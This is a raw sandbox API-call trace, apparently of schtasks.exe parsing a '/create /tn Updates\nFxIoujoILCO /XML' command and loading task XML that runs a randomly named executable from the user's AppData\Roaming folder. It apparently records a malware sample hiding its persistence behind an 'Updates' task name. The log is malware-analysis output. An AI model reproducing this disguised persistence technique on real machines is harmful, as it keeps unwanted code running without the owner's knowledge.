[0154.043] SetLastError (dwErrCode=0x490)
[0154.043] SetLastError (dwErrCode=0x490)
[0154.043] SetLastError (dwErrCode=0x0)
[0154.043] lstrlenW (lpString="Updates\\nFxIoujoILCO") returned 20
[0154.043] StrChrIW (lpStart="Updates\\nFxIoujoILCO", wMatch=0x3a) returned 0x0
[0154.043] SetLastError (dwErrCode=0x490)
[0154.043] SetLastError (dwErrCode=0x0)
[0154.043] lstrlenW (lpString="Updates\\nFxIoujoILCO") returned 20
[0154.043] SetLastError (dwErrCode=0x0)
[0154.043] SetLastError (dwErrCode=0x0)
[0154.043] lstrlenW (lpString="/XML") returned 4
[0154.043] lstrlenW (lpString="-/") returned 2
[0154.043] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/"
[0154.043] lstrlenW (lpString="create") returned 6
[0154.044] lstrlenW (lpString="create") returned 6
[0154.044] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.044] lstrlenW (lpString="XML") returned 3
[0154.044] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.044] _vsnwprintf (in: _Buffer=0x295380, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|create|") returned 8
[0154.044] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|XML|") returned 5
[0154.044] lstrlenW (lpString="|create|") returned 8
[0154.044] lstrlenW (lpString="|XML|") returned 5
[0154.044] StrStrIW (lpFirst="|create|", lpSrch="|XML|") returned 0x0
[0154.044] SetLastError (dwErrCode=0x490)
[0154.044] lstrlenW (lpString="?") returned 1
[0154.044] lstrlenW (lpString="?") returned 1
[0154.044] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.044] lstrlenW (lpString="XML") returned 3
[0154.044] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.044] _vsnwprintf (in: _Buffer=0x295380, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|?|") returned 3
[0154.044] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|XML|") returned 5
[0154.044] lstrlenW (lpString="|?|") returned 3
[0154.044] lstrlenW (lpString="|XML|") returned 5
[0154.044] SetLastError (dwErrCode=0x490)
[0154.044] lstrlenW (lpString="s") returned 1
[0154.044] lstrlenW (lpString="s") returned 1
[0154.044] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.044] lstrlenW (lpString="XML") returned 3
[0154.044] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.044] _vsnwprintf (in: _Buffer=0x295380, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|s|") returned 3
[0154.045] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|XML|") returned 5
[0154.045] lstrlenW (lpString="|s|") returned 3
[0154.045] lstrlenW (lpString="|XML|") returned 5
[0154.045] SetLastError (dwErrCode=0x490)
[0154.045] lstrlenW (lpString="u") returned 1
[0154.045] lstrlenW (lpString="u") returned 1
[0154.045] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.045] lstrlenW (lpString="XML") returned 3
[0154.045] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.045] _vsnwprintf (in: _Buffer=0x295380, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|u|") returned 3
[0154.045] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|XML|") returned 5
[0154.045] lstrlenW (lpString="|u|") returned 3
[0154.045] lstrlenW (lpString="|XML|") returned 5
[0154.045] SetLastError (dwErrCode=0x490)
[0154.045] lstrlenW (lpString="p") returned 1
[0154.045] lstrlenW (lpString="p") returned 1
[0154.045] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.045] lstrlenW (lpString="XML") returned 3
[0154.045] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.045] _vsnwprintf (in: _Buffer=0x295380, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|p|") returned 3
[0154.045] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|XML|") returned 5
[0154.045] lstrlenW (lpString="|p|") returned 3
[0154.045] lstrlenW (lpString="|XML|") returned 5
[0154.045] SetLastError (dwErrCode=0x490)
[0154.045] lstrlenW (lpString="ru") returned 2
[0154.045] lstrlenW (lpString="ru") returned 2
[0154.045] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.046] lstrlenW (lpString="XML") returned 3
[0154.046] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.046] _vsnwprintf (in: _Buffer=0x295380, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|ru|") returned 4
[0154.046] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|XML|") returned 5
[0154.046] lstrlenW (lpString="|ru|") returned 4
[0154.046] lstrlenW (lpString="|XML|") returned 5
[0154.046] SetLastError (dwErrCode=0x490)
[0154.046] lstrlenW (lpString="rp") returned 2
[0154.046] lstrlenW (lpString="rp") returned 2
[0154.046] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.046] lstrlenW (lpString="XML") returned 3
[0154.046] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.046] _vsnwprintf (in: _Buffer=0x295380, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|rp|") returned 4
[0154.046] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|XML|") returned 5
[0154.046] lstrlenW (lpString="|rp|") returned 4
[0154.046] lstrlenW (lpString="|XML|") returned 5
[0154.046] SetLastError (dwErrCode=0x490)
[0154.046] lstrlenW (lpString="sc") returned 2
[0154.046] lstrlenW (lpString="sc") returned 2
[0154.046] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.046] lstrlenW (lpString="XML") returned 3
[0154.046] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.047] _vsnwprintf (in: _Buffer=0x295380, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|sc|") returned 4
[0154.047] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|XML|") returned 5
[0154.047] lstrlenW (lpString="|sc|") returned 4
[0154.047] lstrlenW (lpString="|XML|") returned 5
[0154.047] SetLastError (dwErrCode=0x490)
[0154.047] lstrlenW (lpString="mo") returned 2
[0154.047] lstrlenW (lpString="mo") returned 2
[0154.047] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.047] lstrlenW (lpString="XML") returned 3
[0154.047] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.047] _vsnwprintf (in: _Buffer=0x295380, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|mo|") returned 4
[0154.047] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|XML|") returned 5
[0154.047] lstrlenW (lpString="|mo|") returned 4
[0154.047] lstrlenW (lpString="|XML|") returned 5
[0154.047] SetLastError (dwErrCode=0x490)
[0154.047] lstrlenW (lpString="d") returned 1
[0154.047] lstrlenW (lpString="d") returned 1
[0154.047] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.047] lstrlenW (lpString="XML") returned 3
[0154.047] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.047] _vsnwprintf (in: _Buffer=0x295380, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|d|") returned 3
[0154.047] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|XML|") returned 5
[0154.047] lstrlenW (lpString="|d|") returned 3
[0154.047] lstrlenW (lpString="|XML|") returned 5
[0154.047] SetLastError (dwErrCode=0x490)
[0154.047] lstrlenW (lpString="m") returned 1
[0154.047] lstrlenW (lpString="m") returned 1
[0154.048] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.048] lstrlenW (lpString="XML") returned 3
[0154.048] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.048] _vsnwprintf (in: _Buffer=0x295380, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|m|") returned 3
[0154.048] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|XML|") returned 5
[0154.048] lstrlenW (lpString="|m|") returned 3
[0154.048] lstrlenW (lpString="|XML|") returned 5
[0154.048] SetLastError (dwErrCode=0x490)
[0154.048] lstrlenW (lpString="i") returned 1
[0154.048] lstrlenW (lpString="i") returned 1
[0154.048] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.048] lstrlenW (lpString="XML") returned 3
[0154.048] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.048] _vsnwprintf (in: _Buffer=0x295380, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|i|") returned 3
[0154.048] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|XML|") returned 5
[0154.048] lstrlenW (lpString="|i|") returned 3
[0154.048] lstrlenW (lpString="|XML|") returned 5
[0154.048] SetLastError (dwErrCode=0x490)
[0154.048] lstrlenW (lpString="tn") returned 2
[0154.048] lstrlenW (lpString="tn") returned 2
[0154.048] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.048] lstrlenW (lpString="XML") returned 3
[0154.048] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.048] _vsnwprintf (in: _Buffer=0x295380, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|tn|") returned 4
[0154.048] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|XML|") returned 5
[0154.048] lstrlenW (lpString="|tn|") returned 4
[0154.048] lstrlenW (lpString="|XML|") returned 5
[0154.049] SetLastError (dwErrCode=0x490)
[0154.049] lstrlenW (lpString="tr") returned 2
[0154.049] lstrlenW (lpString="tr") returned 2
[0154.049] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.049] lstrlenW (lpString="XML") returned 3
[0154.049] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.049] _vsnwprintf (in: _Buffer=0x295380, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|tr|") returned 4
[0154.049] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|XML|") returned 5
[0154.049] lstrlenW (lpString="|tr|") returned 4
[0154.049] lstrlenW (lpString="|XML|") returned 5
[0154.049] SetLastError (dwErrCode=0x490)
[0154.049] lstrlenW (lpString="st") returned 2
[0154.049] lstrlenW (lpString="st") returned 2
[0154.049] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.049] lstrlenW (lpString="XML") returned 3
[0154.049] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.049] _vsnwprintf (in: _Buffer=0x295380, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|st|") returned 4
[0154.049] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|XML|") returned 5
[0154.049] lstrlenW (lpString="|st|") returned 4
[0154.049] lstrlenW (lpString="|XML|") returned 5
[0154.049] SetLastError (dwErrCode=0x490)
[0154.049] lstrlenW (lpString="sd") returned 2
[0154.049] lstrlenW (lpString="sd") returned 2
[0154.049] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.049] lstrlenW (lpString="XML") returned 3
[0154.049] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.049] _vsnwprintf (in: _Buffer=0x295380, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|sd|") returned 4
[0154.049] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|XML|") returned 5
[0154.050] lstrlenW (lpString="|sd|") returned 4
[0154.050] lstrlenW (lpString="|XML|") returned 5
[0154.050] SetLastError (dwErrCode=0x490)
[0154.050] lstrlenW (lpString="ed") returned 2
[0154.050] lstrlenW (lpString="ed") returned 2
[0154.050] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.050] lstrlenW (lpString="XML") returned 3
[0154.050] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.050] _vsnwprintf (in: _Buffer=0x295380, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|ed|") returned 4
[0154.050] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|XML|") returned 5
[0154.050] lstrlenW (lpString="|ed|") returned 4
[0154.050] lstrlenW (lpString="|XML|") returned 5
[0154.050] SetLastError (dwErrCode=0x490)
[0154.050] lstrlenW (lpString="it") returned 2
[0154.050] lstrlenW (lpString="it") returned 2
[0154.050] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.050] lstrlenW (lpString="XML") returned 3
[0154.050] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.050] _vsnwprintf (in: _Buffer=0x295380, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|it|") returned 4
[0154.050] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|XML|") returned 5
[0154.050] lstrlenW (lpString="|it|") returned 4
[0154.050] lstrlenW (lpString="|XML|") returned 5
[0154.050] SetLastError (dwErrCode=0x490)
[0154.050] lstrlenW (lpString="et") returned 2
[0154.050] lstrlenW (lpString="et") returned 2
[0154.050] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.050] lstrlenW (lpString="XML") returned 3
[0154.050] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.051] _vsnwprintf (in: _Buffer=0x295380, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|et|") returned 4
[0154.051] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|XML|") returned 5
[0154.051] lstrlenW (lpString="|et|") returned 4
[0154.051] lstrlenW (lpString="|XML|") returned 5
[0154.051] SetLastError (dwErrCode=0x490)
[0154.051] lstrlenW (lpString="k") returned 1
[0154.051] lstrlenW (lpString="k") returned 1
[0154.051] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.051] lstrlenW (lpString="XML") returned 3
[0154.051] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.051] _vsnwprintf (in: _Buffer=0x295380, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|k|") returned 3
[0154.051] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|XML|") returned 5
[0154.051] lstrlenW (lpString="|k|") returned 3
[0154.051] lstrlenW (lpString="|XML|") returned 5
[0154.051] SetLastError (dwErrCode=0x490)
[0154.051] lstrlenW (lpString="du") returned 2
[0154.051] lstrlenW (lpString="du") returned 2
[0154.051] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.051] lstrlenW (lpString="XML") returned 3
[0154.051] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.051] _vsnwprintf (in: _Buffer=0x295380, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|du|") returned 4
[0154.051] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|XML|") returned 5
[0154.051] lstrlenW (lpString="|du|") returned 4
[0154.051] lstrlenW (lpString="|XML|") returned 5
[0154.052] SetLastError (dwErrCode=0x490)
[0154.052] lstrlenW (lpString="ri") returned 2
[0154.052] lstrlenW (lpString="ri") returned 2
[0154.052] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.052] lstrlenW (lpString="XML") returned 3
[0154.052] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.052] _vsnwprintf (in: _Buffer=0x295380, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|ri|") returned 4
[0154.052] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|XML|") returned 5
[0154.052] lstrlenW (lpString="|ri|") returned 4
[0154.052] lstrlenW (lpString="|XML|") returned 5
[0154.052] SetLastError (dwErrCode=0x490)
[0154.052] lstrlenW (lpString="z") returned 1
[0154.052] lstrlenW (lpString="z") returned 1
[0154.052] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.052] lstrlenW (lpString="XML") returned 3
[0154.052] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.052] _vsnwprintf (in: _Buffer=0x295380, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|z|") returned 3
[0154.052] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|XML|") returned 5
[0154.052] lstrlenW (lpString="|z|") returned 3
[0154.052] lstrlenW (lpString="|XML|") returned 5
[0154.052] SetLastError (dwErrCode=0x490)
[0154.052] lstrlenW (lpString="f") returned 1
[0154.052] lstrlenW (lpString="f") returned 1
[0154.052] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.052] lstrlenW (lpString="XML") returned 3
[0154.053] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.053] _vsnwprintf (in: _Buffer=0x295380, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|f|") returned 3
[0154.053] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|XML|") returned 5
[0154.053] lstrlenW (lpString="|f|") returned 3
[0154.053] lstrlenW (lpString="|XML|") returned 5
[0154.053] SetLastError (dwErrCode=0x490)
[0154.053] lstrlenW (lpString="v1") returned 2
[0154.053] lstrlenW (lpString="v1") returned 2
[0154.053] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.053] lstrlenW (lpString="XML") returned 3
[0154.053] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.053] _vsnwprintf (in: _Buffer=0x295380, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|v1|") returned 4
[0154.053] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|XML|") returned 5
[0154.053] lstrlenW (lpString="|v1|") returned 4
[0154.053] lstrlenW (lpString="|XML|") returned 5
[0154.053] SetLastError (dwErrCode=0x490)
[0154.053] lstrlenW (lpString="xml") returned 3
[0154.053] lstrlenW (lpString="xml") returned 3
[0154.053] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.053] lstrlenW (lpString="XML") returned 3
[0154.053] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.053] _vsnwprintf (in: _Buffer=0x295380, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|xml|") returned 5
[0154.053] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|XML|") returned 5
[0154.053] lstrlenW (lpString="|xml|") returned 5
[0154.053] lstrlenW (lpString="|XML|") returned 5
[0154.053] StrStrIW (lpFirst="|xml|", lpSrch="|XML|") returned="|xml|"
[0154.053] SetLastError (dwErrCode=0x0)
[0154.053] SetLastError (dwErrCode=0x0)
[0154.054] lstrlenW (lpString="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpC690.tmp") returned 49
[0154.054] lstrlenW (lpString="-/") returned 2
[0154.054] StrChrIW (lpStart="-/", wMatch=0x43) returned 0x0
[0154.054] SetLastError (dwErrCode=0x490)
[0154.054] SetLastError (dwErrCode=0x490)
[0154.054] SetLastError (dwErrCode=0x0)
[0154.054] lstrlenW (lpString="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpC690.tmp") returned 49
[0154.054] StrChrIW (lpStart="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpC690.tmp", wMatch=0x3a) returned=":\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpC690.tmp"
[0154.054] lstrlenW (lpString="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpC690.tmp") returned 49
[0154.054] _memicmp (_Buf1=0x294d28, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.054] _memicmp (_Buf1=0x294d58, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.054] SetLastError (dwErrCode=0x7a)
[0154.054] SetLastError (dwErrCode=0x0)
[0154.054] SetLastError (dwErrCode=0x0)
[0154.054] lstrlenW (lpString="C") returned 1
[0154.054] SetLastError (dwErrCode=0x490)
[0154.054] SetLastError (dwErrCode=0x0)
[0154.054] lstrlenW (lpString="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpC690.tmp") returned 49
[0154.054] lstrlenW (lpString="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpC690.tmp") returned 49
[0154.054] GetProcessHeap () returned 0x280000
[0154.054] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x64) returned 0x296a58
[0154.054] SetLastError (dwErrCode=0x0)
[0154.054] lstrlenW (lpString="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpC690.tmp") returned 49
[0154.054] SetLastError (dwErrCode=0x0)
[0154.054] GetProcessHeap () returned 0x280000
[0154.054] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x1fc) returned 0x296ac8
[0154.055] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0
[0154.079] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0
[0154.116] CoCreateInstance (in: rclsid=0x77230c*(Data1=0xf87369f, Data2=0xa4e5, Data3=0x4cfc, Data4=([0]=0xbd, [1]=0x3e, [2]=0x73, [3]=0xe6, [4]=0x15, [5]=0x45, [6]=0x72, [7]=0xdd)), pUnkOuter=0x0, dwClsContext=0x17, riid=0x7720fc*(Data1=0x2faba4c7, Data2=0x4da9, Data3=0x4013, Data4=([0]=0x96, [1]=0x97, [2]=0x20, [3]=0xcc, [4]=0x3f, [5]=0xd4, [6]=0xf, [7]=0x85)), ppv=0xdcfb0 | out: ppv=0xdcfb0*=0x473e40) returned 0x0
[0154.427] TaskScheduler:ITaskService:Connect (This=0x473e40, serverName=0xdcf20*(varType=0x8, wReserved1=0x0, wReserved2=0xcf94, wReserved3=0xd, varVal1=0x0, varVal2=0xdd870), user=0xdcf30*(varType=0x0, wReserved1=0xd, wReserved2=0xcfb8, wReserved3=0xd, varVal1=0x75419cde, varVal2=0xdd870), domain=0xdcf40*(varType=0x0, wReserved1=0x0, wReserved2=0x1ec, wReserved3=0x0, varVal1=0xe, varVal2=0x0), password=0xdcf50*(varType=0x0, wReserved1=0x0, wReserved2=0x9c39, wReserved3=0x7541, varVal1=0x6c, varVal2=0xdd9f0)) returned 0x0
[0154.471] TaskScheduler:IUnknown:AddRef (This=0x473e40) returned 0x2
[0154.471] TaskScheduler:ITaskService:GetFolder (in: This=0x473e40, Path=0x0, ppFolder=0xdd054 | out: ppFolder=0xdd054*=0x473ea8) returned 0x0
[0154.473] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpC690.tmp" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\tmpc690.tmp"), dwDesiredAccess=0x80000000, dwShareMode=0x5, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x10c
[0154.474] GetFileSizeEx (in: hFile=0x10c, lpFileSize=0xdc944 | out: lpFileSize=0xdc944*=1600) returned 1
[0154.474] ReadFile (in: hFile=0x10c, lpBuffer=0xdc94c, nNumberOfBytesToRead=0x2, lpNumberOfBytesRead=0xdc954, lpOverlapped=0x0 | out: lpBuffer=0xdc94c*, lpNumberOfBytesRead=0xdc954*=0x2, lpOverlapped=0x0) returned 1
[0154.474] SetFilePointer (in: hFile=0x10c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
[0154.474] malloc (_Size=0x641) returned 0x4726f0
[0154.474] ReadFile (in: hFile=0x10c, lpBuffer=0x4726f0, nNumberOfBytesToRead=0x641, lpNumberOfBytesRead=0xdc954, lpOverlapped=0x0 | out: lpBuffer=0x4726f0*, lpNumberOfBytesRead=0xdc954*=0x640, lpOverlapped=0x0) returned 1
[0154.474] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0x4726f0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 1601
[0154.475] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0x4726f0, cbMultiByte=-1, lpWideCharStr=0x2a4ecc, cchWideChar=1601 | out: lpWideCharStr="\n\n \n 2014-10-25T14:27:44.8929027\n Q9IATRKPRH\\kEecfMwgj\n \n \n \n true\n Q9IATRKPRH\\kEecfMwgj\n \n \n false\n \n \n \n \n Q9IATRKPRH\\kEecfMwgj\n InteractiveToken\n LeastPrivilege\n \n \n \n StopExisting\n false\n true\n false\n true\n false\n \n true\n false\n \n true\n true\n false\n false\n false\n PT0S\n 7\n \n \n \n C:\\Users\\kEecfMwgj\\AppData\\Roaming\\nFxIoujoILCO.exe\n \n \n") returned 1601
[0154.475] SysStringLen (param_1="\n\n \n 2014-10-25T14:27:44.8929027\n Q9IATRKPRH\\kEecfMwgj\n \n \n \n true\n Q9IATRKPRH\\kEecfMwgj\n \n \n false\n \n \n \n \n Q9IATRKPRH\\kEecfMwgj\n InteractiveToken\n LeastPrivilege\n \n \n \n StopExisting\n false\n true\n false\n true\n false\n \n true\n false\n \n true\n true\n false\n false\n false\n PT0S\n 7\n \n \n \n C:\\Users\\kEecfMwgj\\AppData\\Roaming\\nFxIoujoILCO.exe\n \n \n") returned 0x640
[0154.475] VarBstrCat (in: bstrLeft=0x0, bstrRight="\n\n \n 2014-10-25T14:27:44.8929027\n Q9IATRKPRH\\kEecfMwgj\n \n \n \n true\n Q9IATRKPRH\\kEecfMwgj\n \n \n false\n \n \n \n \n Q9IATRKPRH\\kEecfMwgj\n InteractiveToken\n LeastPrivilege\n \n \n \n StopExisting\n false\n true\n false\n true\n false\n \n true\n false\n \n true\n true\n false\n false\n false\n PT0S\n 7\n \n \n \n C:\\Users\\kEecfMwgj\\AppData\\Roaming\\nFxIoujoILCO.exe\n \n \n", pbstrResult=0xdc8f4 | out: pbstrResult=0xdc8f4) returned 0x0
[0154.476] free (_Block=0x4726f0)
